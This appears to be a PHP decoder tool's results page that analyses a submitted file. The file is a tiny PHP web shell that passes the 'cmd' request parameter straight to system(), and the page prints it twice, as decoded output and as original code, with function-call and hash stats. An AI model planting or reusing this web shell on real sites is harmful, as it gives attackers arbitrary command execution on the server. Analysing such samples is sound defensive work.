Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if(isset($_REQUEST['cmd']) ){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($c..

Decoded Output download

<?php
if(isset($_REQUEST['cmd']) ){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>

Did this file decode correctly?

Original Code

<?php
if(isset($_REQUEST['cmd']) ){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>

Function Calls

system 1

Variables

$cmd None

Stats

MD5 a0bbaae133da340f9a7df2325596c164
Eval Count 0
Decode Time 105 ms